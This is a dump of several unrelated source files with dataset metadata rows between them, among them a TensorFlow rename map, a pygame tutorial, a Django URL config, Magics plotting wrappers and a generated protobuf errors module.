"tf.orthogonal_initializer":
"tf.compat.v1.orthogonal_initializer",
"tf.initializers.orthogonal":
"tf.compat.v1.initializers.orthogonal",
"tf.glorot_uniform_initializer":
"tf.compat.v1.glorot_uniform_initializer",
"tf.initializers.glorot_uniform":
"tf.compat.v1.initializers.glorot_uniform",
"tf.glorot_normal_initializer":
"tf.compat.v1.glorot_normal_initializer",
"tf.initializers.glorot_normal":
"tf.compat.v1.initializers.glorot_normal",
"tf.initializers.identity":
"tf.compat.v1.initializers.identity",
"tf.initializers.lecun_normal":
"tf.compat.v1.initializers.lecun_normal",
"tf.initializers.lecun_uniform":
"tf.compat.v1.initializers.lecun_uniform",
"tf.initializers.he_normal":
"tf.compat.v1.initializers.he_normal",
"tf.initializers.he_uniform":
"tf.compat.v1.initializers.he_uniform",
"tf.data.experimental.map_and_batch_with_legacy_function":
"tf.compat.v1.data.experimental.map_and_batch_with_legacy_function",
"tf.nn.conv2d_backprop_input":
"tf.nn.conv2d_transpose",
"tf.test.compute_gradient":
"tf.compat.v1.test.compute_gradient",
"tf.floor_div":
"tf.math.floordiv",
"tf.where":
"tf.compat.v1.where",
"tf.where_v2":
"tf.compat.v2.where",
}
# pylint: enable=line-too-long
symbol_renames = renames_v2.renames
symbol_renames.update(manual_symbol_renames)
addons_symbol_mappings = {
"tf.contrib.layers.poincare_normalize":
"tfa.layers.PoincareNormalize",
"tf.contrib.layers.maxout":
"tfa.layers.Maxout",
"tf.contrib.layers.group_norm":
"tfa.layers.GroupNormalization",
"tf.contrib.layers.instance_norm":
"tfa.layers.InstanceNormalization",
"tf.contrib.sparsemax.sparsemax":
"tfa.activations.sparsemax",
"tf.contrib.losses.metric_learning.contrastive_loss":
"tfa.losses.ContrastiveLoss",
"tf.contrib.losses.metric_learning.lifted_struct_loss":
"tfa.losses.LiftedStructLoss",
"tf.contrib.sparsemax.sparsemax_loss":
"tfa.losses.SparsemaxLoss",
"tf.contrib.losses.metric_learning.triplet_semihard_loss":
"tfa.losses.TripletSemiHardLoss",
"tf.contrib.opt.LazyAdamOptimizer":
"tfa.optimizers.LazyAdam",
"tf.contrib.opt.MovingAverageOptimizer":
"tfa.optimizers.MovingAverage",
"tf.contrib.opt.MomentumWOptimizer":
"tfa.optimizers.SGDW",
"tf.contrib.opt.AdamWOptimizer":
"tfa.optimizers.AdamW",
"tf.contrib.opt.extend_with_decoupled_weight_decay":
"tfa.optimizers.extend_with_decoupled_weight_decay",
"tf.contrib.text.skip_gram_sample":
"tfa.text.skip_gram_sample",
"tf.contrib.text.skip_gram_sample_with_text_vocab":
"tfa.text.skip_gram_sample_with_text_vocab",
"tf.contrib.image.dense_image_warp":
"tfa.image.dense_image_warp",
"tf.contrib.image.adjust_hsv_in_yiq":
"tfa.image.adjust_hsv_in_yiq",
"tf.contrib.image.compose_transforms":
"tfa.image.compose_transforms",
"tf.contrib.image.random_hsv_in_yiq":
"tfa.image.random_hsv_in_yiq",
"tf.contrib.image.angles_to_projective_transforms":
"tfa.image.angles_to_projective_transforms",
"tf.contrib.image.matrices_to_flat_transforms":
"tfa.image.matricies_to_flat_transforms",
"tf.contrib.image.rotate":
"tfa.image.rotate",
"tf.contrib.image.transform":
"tfa.image.transform",
"tf.contrib.rnn.NASCell":
"tfa.rnn.NASCell",
"tf.contrib.rnn.LayerNormBasicLSTMCell":
"tfa.rnn.LayerNormLSTMCell"
}
| [
"[email protected]"
] | |
9e1d8e2de437c05c4bfb0801655ea47bebb855fb | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_palls.py | dbff538f21fd450bb0e9c7a702715178521cdfad | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py |
# class header
class _PALLS():
def __init__(self,):
self.name = "PALLS"
self.definitions = pall
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['pall']
| [
"[email protected]"
] | |
3498868b0b750bda0169ecc70e6676ab407c13b9 | e2f4cbbde6cd6f169a5ac36a5ae050d89f895158 | /Python_Workspace/Modules/package1/mod2.py | ebb9da7375c3d08a03d56eee659d36357caa8574 | [] | no_license | shubhamkumar1739/Linux_Workshop | 7a8511eebb049d6a0518bd1c8101038bc6b0e4e9 | c22e51943f012981165c41a76cea50b142bf3d77 | refs/heads/master | 2020-03-30T13:03:12.525964 | 2018-10-06T03:34:58 | 2018-10-06T03:34:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11 | py | var1_m2=77
| [
"[email protected]"
] | |
3f395841d95506c7c4b11095f96b073ae8043dea | b5a7c9ae13c81d655c176ceb0b8a73b4399cbf7a | /practico_02/ejercicio_01.py | 847b669e2c61394631d2e994bc0d7f2731006427 | [
"MIT"
] | permissive | ELC/TUPPython | 7459f4af5eb0306da1a61fd1e175ca4a68e5ac46 | 0115ece1dfdd599626f1cdeb410245fbee2aa4f8 | refs/heads/master | 2023-06-07T21:03:12.151001 | 2021-03-17T22:31:51 | 2021-03-17T22:31:51 | 338,466,855 | 1 | 1 | MIT | 2021-02-28T02:48:20 | 2021-02-13T00:36:50 | Python | UTF-8 | Python | false | false | 856 | py | """Módulos
Antes de realizar este TP, se recomienda ver el siguiente video:
https://youtu.be/A47sszUdTsM
En este archivo se deben importar los módulos:
- main.py as main
- source/util.py as util
- source/controller/controller.py as controller
Los imports deben hacerse de forma tal que funcionen con TODAS las formas
posibles de invocación (estando parados en la carpeta practico_02):
$PATH$/practico_02> python ejercicio_01.py
$PATH$/practico_02> python -m ejercicio_01
Referencia: https://docs.python.org/3/reference/import.html#the-import-system
"""
import main
import source.util as util
import source.controller.controller as controller
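# Plain absolute imports satisfy both invocation forms because in each case the
# practico_02 directory ends up on sys.path (as the script directory or as the CWD).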
# NO MODIFICAR - INICIO
assert main.name == "main"
assert util.name == "util"
assert controller.name == "controller"
# NO MODIFICAR - FIN
# El siguiente ejercicio se encuentra en source/ejercicio_02.py
| [
"[email protected]"
] | |
1719fe5138986b05ab207d3c7b30490116f74c96 | e980e13bd0d264b3880705fb53a795a89fb5cfe6 | /sales_order/repair_order.py | f6ba01e2762bf878cdbc8480aa7f1e1f9f8ddf80 | [] | no_license | qianpeng-shen/u8 | 8e430ccab5390254b6660cbd047fc2ac495a04ca | 7fd28399dbf921826c1ef024800994412ab1b623 | refs/heads/master | 2020-05-13T20:28:16.764800 | 2019-04-16T09:29:58 | 2019-04-16T09:29:58 | 181,657,315 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,972 | py | # -*- coding:utf-8 -*-
# Parse repair-type (maintenance) work order data
def analysis_repair(data):
repair_list = []
for repair in range(1,data.nrows):
repair_dict = {}
repair_dict['Status'] = data.cell(repair,1).value
repair_dict['UserID_ZDR'] = data.cell(repair,7).value
repair_dict['AdgoupID'] = data.cell(repair,8).value
repair_dict['UserID_KF'] = data.cell(repair,10).value
        if data.cell(repair,11).value:
if data.cell(repair,11).value == '网页表单':
repair_dict['CreateOrderChannel'] = '线上'
else:
repair_dict['CreateOrderChannel'] = '电话'
repair_dict['DetailContentMore'] = data.cell(repair,12).value
repair_dict['CallerNumber'] = data.cell(repair,13).value
repair_dict['UserName'] = data.cell(repair,20).value
repair_dict['ProvinceID'] = data.cell(repair,22).value
repair_dict['MunicipalityID'] = data.cell(repair,23).value
repair_dict['PrefectureID'] = data.cell(repair,24).value
repair_dict['Address_Detail'] = data.cell(repair,34).value
repair_dict['SN_GDXX'] = data.cell(repair,38).value
        repair_dict['AppointmentTime'] = (data.cell(repair,40).value).replace('/','-') + 'T00:00:00Z'
repair_dict['WarrantyPeriod'] = data.cell(repair,41).value
if data.cell(repair,43).value:
malfunction = data.cell(repair,43).value
if ',' in malfunction:
repair_dict['Breakdown_PhenomenonID'] = malfunction.split(',')[1]
repair_dict['RelatedServiceProvider'] = data.cell(repair,46).value
repair_dict['ServiceProvidersNumber'] = data.cell(repair,48).value
repair_dict['ActivityContent'] = data.cell(repair,49).value
repair_dict['Reason'] = data.cell(repair,50).value
repair_dict['MailingAddress'] = data.cell(repair,52).value
repair_dict['ReturnToLogistics'] = data.cell(repair,53).value
        repair_list.append(repair_dict)
    return repair_list
| [
"[email protected]"
] | |
fbe657576a5f4817faee93631a0c29bd41fef7fd | 43461f999228079c9bfee03f0e4043f08426051f | /python_zero/飞机大战/hm_11_监听退出事件.py | ac165dcc7445e849fe8d415791911b793b4875e3 | [] | no_license | MapleStoryBoy/spider | f9af844ae9812fe21141060213ac2677e719ac73 | b014d81d52805f9317e85b66024d047e73d59053 | refs/heads/master | 2020-05-21T18:27:50.585790 | 2019-07-12T10:11:58 | 2019-07-12T10:11:58 | 186,132,575 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,376 | py | import pygame
# Initialize the game
pygame.init()
# Create the game window, 480 * 700
screen = pygame.display.set_mode((480, 700))
# Draw the background image
bg = pygame.image.load("./images/background.png")
screen.blit(bg, (0, 0))
# pygame.display.update()
# Draw the hero's plane
hero = pygame.image.load("./images/me1.png")
screen.blit(hero, (150, 300))
# update() can be called once after all of the drawing work is finished
pygame.display.update()
# Create a clock object
clock = pygame.time.Clock()
# 1. Define a rect to record the plane's initial position
hero_rect = pygame.Rect(150, 300, 102, 126)
# Game loop -> the game officially begins!
while True:
    # Specify how often the code inside the loop body is executed
clock.tick(60)
    # Listen for events
for event in pygame.event.get():
        # Check whether the event type is the quit event
if event.type == pygame.QUIT:
            print("Exiting the game...")
            # quit unloads all of the pygame modules
pygame.quit()
            # exit() terminates the currently running program immediately
exit()
    # 2. Update the plane's position
hero_rect.y -= 1
    # Check the plane's position
if hero_rect.y <= 0:
hero_rect.y = 700
    # 3. Call blit to draw the images
screen.blit(bg, (0, 0))
screen.blit(hero, hero_rect)
    # 4. Call update to refresh the display
pygame.display.update()
pygame.quit()
| [
"[email protected]"
] | |
db4bc9a1b1db2b8a2081ccbfc57774f296f255e9 | 1f9e643698f683e77ed5f253cafda776b204f5d2 | /backend/franchise_guru_4345/urls.py | 5f0e09df865079b377bc64581a60b6f4c1dedb06 | [] | no_license | crowdbotics-apps/franchise-guru-4345 | ca907aaed1618abd5828ce20c108a90f01f09af7 | 53712fe881aa94579121e1c7384ab3e039fccd9d | refs/heads/master | 2022-12-12T06:50:11.577025 | 2019-06-06T20:54:46 | 2019-06-06T20:54:46 | 190,648,540 | 0 | 0 | null | 2022-12-06T16:07:16 | 2019-06-06T20:54:42 | JavaScript | UTF-8 | Python | false | false | 1,074 | py | """franchise_guru_4345 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
    1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url('', include('home.urls')),
url(r'^accounts/', include('allauth.urls')),
url(r'^api/v1/', include('home.api.v1.urls')),
url(r'^admin/', admin.site.urls),
]
admin.site.site_header = 'Franchise Guru'
admin.site.site_title = 'Franchise Guru Admin Portal'
admin.site.index_title = 'Franchise Guru Admin'
| [
"[email protected]"
] | |
4fed6cdfbfd5f2a72de1850169ab92171fcb5f2b | ded46c3a86c2a70328a63d779ac038d636ae5906 | /_WSpython/Pandas06_04_GroupByChkPop_최임정.py | 25b7e2d0123dcbc8d13c20046ed655462fdfe522 | [] | no_license | imjoung/hongik_univ | 82d0e7ea31763713f51bbde9d45e4aae5cb73849 | 82a3a77605d74d13eb76b915b215f6e245968180 | refs/heads/main | 2023-06-24T12:49:46.087083 | 2021-07-15T06:31:57 | 2021-07-15T06:31:57 | 379,128,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py |
# coding: utf-8
# In[19]:
import pandas as pd
df=pd.read_csv('../data/gapminder.tsv', sep='\t')
# In[20]:
uniqueList=df['year'].unique()
for idx in uniqueList:
yearList=df[df['year'] == idx]
print(yearList['pop'].mean())
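# The same per-year means could also be computed in a single step with a groupby,
# e.g. df.groupby('year')['pop'].mean()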
| [
"[email protected]"
] | |
3401ca65f75073dbe9b340ead4558693cb3b86eb | 1605c2db57cabfce9d146e891b22e38b85c37035 | /docs/reference/actions.py | d30f816795f6bc57107f80a8fc893396be519c45 | [
"Apache-2.0"
] | permissive | sylvielamythepaut/climetlab | 22499475e2220021145f4f6c84f6526a19d43ba4 | 59516b8a510ad506a12ad32bea9e8b98bdb9abf3 | refs/heads/master | 2022-12-21T11:51:41.243440 | 2020-09-18T07:42:45 | 2020-09-18T07:42:45 | 296,547,196 | 0 | 0 | Apache-2.0 | 2020-09-18T07:42:46 | 2020-09-18T07:30:00 | null | UTF-8 | Python | false | false | 10,710 | py | import inspect
from typing import List
from Magics import macro
def _given_args(frame):
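    """Return the keyword arguments of the calling wrapper whose values differ from
    their declared defaults, so that only explicitly-changed settings are forwarded.
    """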
func = frame.f_globals[frame.f_code.co_name]
user_args = inspect.getargvalues(frame)
code_args = inspect.getfullargspec(func)
given = {}
if code_args.kwonlydefaults:
pairs = list(code_args.kwonlydefaults.items())
else:
pairs = list(zip(code_args.args, code_args.defaults))
for name, value in pairs:
if user_args.locals[name] is not value:
given[name] = user_args.locals[name]
return given
def mcoast(
*,
# [Coastlines] This action controls the plotting of coastlines, rivers, cities and country boundaries, as well as the latitude/longitude grid lines.
map_coastline_general_style: str = "",
map_coastline: bool = True,
map_grid: bool = True,
map_label: bool = True,
# [CoastPlotting]
map_coastline_resolution: str = "automatic",
map_coastline_land_shade: bool = False,
map_coastline_land_shade_colour: str = "green",
map_coastline_sea_shade: bool = False,
map_coastline_sea_shade_colour: str = "blue",
map_boundaries: bool = False,
map_cities: bool = False,
map_preview: bool = False,
map_rivers: str = False,
map_rivers_style: str = "solid",
map_rivers_colour: str = "blue",
map_rivers_thickness: int = 1,
map_user_layer: str = False,
map_user_layer_name: str = "",
map_user_layer_projection: str = "",
map_user_layer_style: str = "solid",
map_user_layer_colour: str = "blue",
map_user_layer_thickness: int = 1,
map_coastline_colour: str = "black",
map_coastline_style: str = "solid",
map_coastline_thickness: int = 1,
# [GridPlotting]
map_grid_latitude_reference: float = 0,
map_grid_latitude_increment: float = 10.0,
map_grid_longitude_reference: float = 0,
map_grid_longitude_increment: float = 20.0,
map_grid_line_style: str = "solid",
map_grid_thickness: int = 1,
map_grid_colour: str = "black",
map_grid_frame: bool = False,
map_grid_frame_line_style: str = "solid",
map_grid_frame_thickness: int = 1,
map_grid_frame_colour: str = "black",
# [LabelPlotting]
map_label_font: str = "sansserif",
map_label_font_style: str = "normal",
map_label_colour: str = "black",
map_label_height: float = 0.25,
map_label_blanking: bool = True,
map_label_latitude_frequency: int = 1,
map_label_longitude_frequency: int = 1,
map_label_left: bool = True,
map_label_right: bool = True,
map_label_top: bool = True,
map_label_bottom: bool = True,
):
return macro.mcoast(**_given_args(inspect.currentframe()))
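# Usage sketch (the values are illustrative, not taken from the original file): since
# _given_args() keeps only the arguments that differ from their defaults, a call like
#   coastlines = mcoast(map_coastline_colour="grey", map_grid=False)
# forwards exactly those two settings to macro.mcoast().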
def mcont(
*,
# [Contour] This action controls the plotting of isolines, contour bands and grid points. It is used to plot gridded data, such as fields.
legend: bool = False,
contour: str = True,
contour_method: str = "automatic",
contour_interpolation_floor: float = -2147483647,
contour_interpolation_ceiling: float = 2147483647,
contour_automatic_setting: str = False,
contour_style_name: str = "",
contour_metadata_only: bool = False,
contour_hilo: str = False,
contour_grid_value_plot: str = False,
# [Akima474Method]
contour_akima_x_resolution: float = 1.5,
contour_akima_y_resolution: float = 1.5,
# [Akima760Method]
#contour_akima_x_resolution: float = 1.5,
#contour_akima_y_resolution: float = 1.5,
# [AutomaticContourMethod]
# [CountSelectionType]
contour_max_level: float = 1e+21,
contour_min_level: float = -1e+21,
contour_shade_max_level: float = 1e+21,
contour_shade_min_level: float = -1e+21,
contour_level_count: int = 10,
contour_level_tolerance: int = 2,
contour_reference_level: float = 0.0,
# [HighHiLo]
contour_hilo_type: str = "text",
contour_hilo_window_size: int = 3,
contour_hilo_max_value: float = 1e+21,
contour_hilo_min_value: float = -1e+21,
contour_hi_max_value: float = 1e+21,
contour_hi_min_value: float = -1e+21,
contour_lo_max_value: float = 1e+21,
contour_lo_min_value: float = -1e+21,
contour_hilo_marker: str = False,
# [IntervalSelectionType]
#contour_max_level: float = 1e+21,
#contour_min_level: float = -1e+21,
#contour_shade_max_level: float = 1e+21,
#contour_shade_min_level: float = -1e+21,
#contour_reference_level: float = 0.0,
contour_interval: float = 8.0,
# [IsoLabel]
contour_label_type: str = "number",
contour_label_text: str = "",
contour_label_height: float = 0.3,
contour_label_format: str = "(automatic)",
contour_label_blanking: bool = True,
contour_label_font: str = "sansserif",
contour_label_font_style: str = "normal",
contour_label_colour: str = "contour_line_colour",
contour_label_frequency: int = 2,
# [IsoShading]
contour_shade_technique: str = "polygon_shading",
#contour_shade_max_level: float = 1e+21,
#contour_shade_min_level: float = -1e+21,
contour_shade_colour_method: str = "calculate",
# [LevelListSelectionType]
#contour_max_level: float = 1e+21,
#contour_min_level: float = -1e+21,
#contour_shade_max_level: float = 1e+21,
#contour_shade_min_level: float = -1e+21,
contour_level_list: List[float] = [],
# [LowHiLo]
#contour_hilo_type: str = "text",
#contour_hilo_window_size: int = 3,
#contour_hilo_max_value: float = 1e+21,
#contour_hilo_min_value: float = -1e+21,
#contour_hi_max_value: float = 1e+21,
#contour_hi_min_value: float = -1e+21,
#contour_lo_max_value: float = 1e+21,
#contour_lo_min_value: float = -1e+21,
#contour_hilo_marker: str = False,
# [NoIsoPlot]
contour_line_style: str = "solid",
contour_line_thickness: int = 1,
contour_line_colour_rainbow: bool = False,
contour_line_colour: str = "blue",
contour_line_colour_rainbow_method: str = "calculate",
contour_line_colour_rainbow_max_level_colour: str = "blue",
contour_line_colour_rainbow_min_level_colour: str = "red",
contour_line_colour_rainbow_direction: str = "anti_clockwise",
contour_line_colour_rainbow_colour_list: List[str] = [],
contour_line_colour_rainbow_colour_list_policy: str = "lastone",
contour_line_thickness_rainbow_list: List[int] = [],
contour_line_thickness_rainbow_list_policy: str = "lastone",
contour_line_style_rainbow_list: List[str] = [],
contour_line_style_rainbow_list_policy: str = "lastone",
contour_highlight: bool = True,
contour_level_selection_type: str = "count",
contour_label: bool = True,
contour_shade: bool = False,
contour_legend_only: bool = False,
# [ValuePlot]
contour_grid_value_type: str = "normal",
contour_grid_value_plot_type: str = "value",
):
return macro.mcont(**_given_args(inspect.currentframe()))
def msymb(
*,
# [SymbolAdvancedTableMode]
symbol_advanced_table_selection_type: str = "count",
symbol_advanced_table_min_value: float = -1e+21,
symbol_advanced_table_max_value: float = 1e+21,
symbol_advanced_table_level_count: int = 10,
symbol_advanced_table_level_tolerance: int = 2,
symbol_advanced_table_interval: float = 8.0,
symbol_advanced_table_reference_level: float = 0.0,
symbol_advanced_table_level_list: List[float] = [],
symbol_advanced_table_colour_method: str = "calculate",
symbol_advanced_table_max_level_colour: str = "blue",
symbol_advanced_table_min_level_colour: str = "red",
symbol_advanced_table_colour_direction: str = "anti_clockwise",
symbol_advanced_table_colour_list: List[str] = [],
symbol_advanced_table_colour_list_policy: str = "lastone",
symbol_advanced_table_marker_list: List[int] = [],
symbol_advanced_table_marker_name_list: List[str] = [],
symbol_advanced_table_marker_list_policy: str = "lastone",
symbol_advanced_table_height_method: str = "list",
symbol_advanced_table_height_max_value: float = 0.2,
symbol_advanced_table_height_min_value: float = 0.1,
symbol_advanced_table_height_list: List[float] = [],
symbol_advanced_table_height_list_policy: str = "lastone",
symbol_advanced_table_text_list: List[str] = [],
symbol_advanced_table_text_list_policy: str = "cycle",
symbol_advanced_table_text_font: str = "sansserif",
symbol_advanced_table_text_font_size: float = 0.25,
symbol_advanced_table_text_font_style: str = "normal",
symbol_advanced_table_text_font_colour: str = "automatic",
symbol_advanced_table_text_display_type: str = "none",
symbol_advanced_table_outlayer_method: bool = "none",
symbol_advanced_table_outlayer_min_value: float = -1e+21,
symbol_advanced_table_outlayer_max_value: float = 1e+21,
# [SymbolIndividualMode]
legend_user_text: str = "",
symbol_colour: str = "blue",
symbol_height: float = 0.2,
symbol_marker_mode: str = "index",
symbol_marker_index: int = 1,
symbol_marker_name: str = "dot",
symbol_image_path: str = "",
symbol_image_format: str = "automatic",
symbol_image_width: float = -1.0,
symbol_image_height: float = -1.0,
symbol_text_list: List[str] = [],
symbol_text_position: str = "right",
symbol_text_font: str = "sansserif",
symbol_text_font_size: float = 0.25,
symbol_text_font_style: str = "normal",
symbol_text_font_colour: str = "automatic",
symbol_legend_height: float = -1.0,
# [SymbolPlotting] This action controls the plotting of meteorological and marker symbols. It is used to plot point data, such as observations.
legend: bool = False,
symbol_scaling_method: bool = False,
symbol_scaling_level_0_height: float = 0.1,
symbol_scaling_factor: float = 4.0,
symbol_type: str = "number",
symbol_table_mode: str = "OFF",
#symbol_marker_mode: str = "index",
symbol_format: str = "(automatic)",
symbol_text_blanking: bool = False,
symbol_outline: bool = False,
symbol_outline_colour: str = "black",
symbol_outline_thickness: int = 1,
symbol_outline_style: str = "solid",
symbol_connect_line: bool = False,
symbol_connect_automatic_line_colour: bool = True,
symbol_connect_line_colour: str = "black",
symbol_connect_line_thickness: int = 1,
symbol_connect_line_style: str = "solid",
symbol_legend_only: bool = False,
# [SymbolTableMode]
symbol_min_table: List[float] = [],
symbol_max_table: List[float] = [],
symbol_marker_table: List[int] = [],
symbol_name_table: List[str] = [],
symbol_colour_table: List[str] = [],
symbol_height_table: List[float] = [],
):
return macro.msymb(**_given_args(inspect.currentframe()))
| [
"[email protected]"
] | |
5ec23bfac0f13f11f9935fea8caf3b8b1e956401 | c4af67db4c523d20f2d55aef90ba77db1fb53c38 | /CMFCalendar/testing.py | 0918f04c86d1a5fb9cdbaaf7709a9ab261d013b7 | [] | no_license | dtgit/dtedu | e59b16612d7d9ea064026bf80a44657082ef45a3 | d787885fe7ed0de6f9e40e9b05d852a0e9d60677 | refs/heads/master | 2020-04-06T05:22:50.025074 | 2009-04-08T20:13:20 | 2009-04-08T20:13:20 | 171,351 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,008 | py | ##############################################################################
#
# Copyright (c) 2006 Zope Corporation and Contributors. All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
""" Unit test layers.
$Id: testing.py 73064 2007-03-08 14:03:20Z yuppie $
"""
from Testing import ZopeTestCase
ZopeTestCase.installProduct('ZCTextIndex', 1)
ZopeTestCase.installProduct('CMFCore', 1)
import transaction
from Products.Five import zcml
from Products.CMFCore.testing import FunctionalZCMLLayer
from Products.CMFDefault.factory import addConfiguredSite
class FunctionalLayer(FunctionalZCMLLayer):
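    """Functional test layer that loads the CMFCalendar ZCML (plus its dependencies)
    and creates a configured CMF site named 'site' for the lifetime of the layer."""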
@classmethod
def setUp(cls):
import Products.CMFCalendar
import Products.CMFDefault
import Products.CMFTopic
import Products.DCWorkflow
zcml.load_config('configure.zcml', Products.CMFCalendar)
zcml.load_config('configure.zcml', Products.CMFDefault)
zcml.load_config('configure.zcml', Products.CMFTopic)
zcml.load_config('configure.zcml', Products.DCWorkflow)
app = ZopeTestCase.app()
addConfiguredSite(app, 'site', 'Products.CMFDefault:default',
snapshot=False,
extension_ids=('Products.CMFCalendar:default',
'Products.CMFCalendar:skins_support'))
transaction.commit()
ZopeTestCase.close(app)
@classmethod
def tearDown(cls):
app = ZopeTestCase.app()
app._delObject('site')
transaction.commit()
ZopeTestCase.close(app)
| [
"[email protected]"
] | |
6485d44a97f1ed29a4fa36480a7c390436e0aa7f | 2b25aae9266437b657e748f3d6fea4db9e9d7f15 | /CMU/6lab/coroutines1.py | a44559612b62e023d62943e13b80f94a5246447f | [] | no_license | Zilby/Stuy-Stuff | b1c3bc23abf40092a8a7a80e406e7c412bd22ae0 | 5c5e375304952f62667d3b34b36f0056c1a8e753 | refs/heads/master | 2020-05-18T03:03:48.210196 | 2018-11-15T04:50:03 | 2018-11-15T04:50:03 | 24,191,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | s="The quick brown fox jumped over the lazy old dog."
def capitalize():
while True:
value=yield
print value.upper()
c=capitalize()
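# Prime the coroutine: next() runs it up to the first yield so that send() can deliver values.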
c.next()
for word in s.split():
c.send(word)
| [
"[email protected]"
] | |
0aefadcd0195f3d016d2f2e73d810a3fa481c9bf | 42c48f3178a48b4a2a0aded547770027bf976350 | /google/ads/google_ads/v3/proto/errors/keyword_plan_keyword_error_pb2.py | 72f053c63c315f0883e175fbdc4ef1c9f7dc2a89 | [
"Apache-2.0"
] | permissive | fiboknacky/google-ads-python | e989464a85f28baca1f28d133994c73759e8b4d6 | a5b6cede64f4d9912ae6ad26927a54e40448c9fe | refs/heads/master | 2021-08-07T20:18:48.618563 | 2020-12-11T09:21:29 | 2020-12-11T09:21:29 | 229,712,514 | 0 | 0 | Apache-2.0 | 2019-12-23T08:44:49 | 2019-12-23T08:44:49 | null | UTF-8 | Python | false | true | 5,055 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v3/proto/errors/keyword_plan_keyword_error.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v3/proto/errors/keyword_plan_keyword_error.proto',
package='google.ads.googleads.v3.errors',
syntax='proto3',
serialized_options=_b('\n\"com.google.ads.googleads.v3.errorsB\034KeywordPlanKeywordErrorProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v3/errors;errors\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V3.Errors\312\002\036Google\\Ads\\GoogleAds\\V3\\Errors\352\002\"Google::Ads::GoogleAds::V3::Errors'),
serialized_pb=_b('\nEgoogle/ads/googleads_v3/proto/errors/keyword_plan_keyword_error.proto\x12\x1egoogle.ads.googleads.v3.errors\x1a\x1cgoogle/api/annotations.proto\"\x82\x02\n\x1bKeywordPlanKeywordErrorEnum\"\xe2\x01\n\x17KeywordPlanKeywordError\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12\x1e\n\x1aINVALID_KEYWORD_MATCH_TYPE\x10\x02\x12\x15\n\x11\x44UPLICATE_KEYWORD\x10\x03\x12\x19\n\x15KEYWORD_TEXT_TOO_LONG\x10\x04\x12\x1d\n\x19KEYWORD_HAS_INVALID_CHARS\x10\x05\x12\x1e\n\x1aKEYWORD_HAS_TOO_MANY_WORDS\x10\x06\x12\x18\n\x14INVALID_KEYWORD_TEXT\x10\x07\x42\xf7\x01\n\"com.google.ads.googleads.v3.errorsB\x1cKeywordPlanKeywordErrorProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v3/errors;errors\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V3.Errors\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V3\\Errors\xea\x02\"Google::Ads::GoogleAds::V3::Errorsb\x06proto3')
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_KEYWORDPLANKEYWORDERRORENUM_KEYWORDPLANKEYWORDERROR = _descriptor.EnumDescriptor(
name='KeywordPlanKeywordError',
full_name='google.ads.googleads.v3.errors.KeywordPlanKeywordErrorEnum.KeywordPlanKeywordError',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_KEYWORD_MATCH_TYPE', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DUPLICATE_KEYWORD', index=3, number=3,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KEYWORD_TEXT_TOO_LONG', index=4, number=4,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KEYWORD_HAS_INVALID_CHARS', index=5, number=5,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KEYWORD_HAS_TOO_MANY_WORDS', index=6, number=6,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_KEYWORD_TEXT', index=7, number=7,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=168,
serialized_end=394,
)
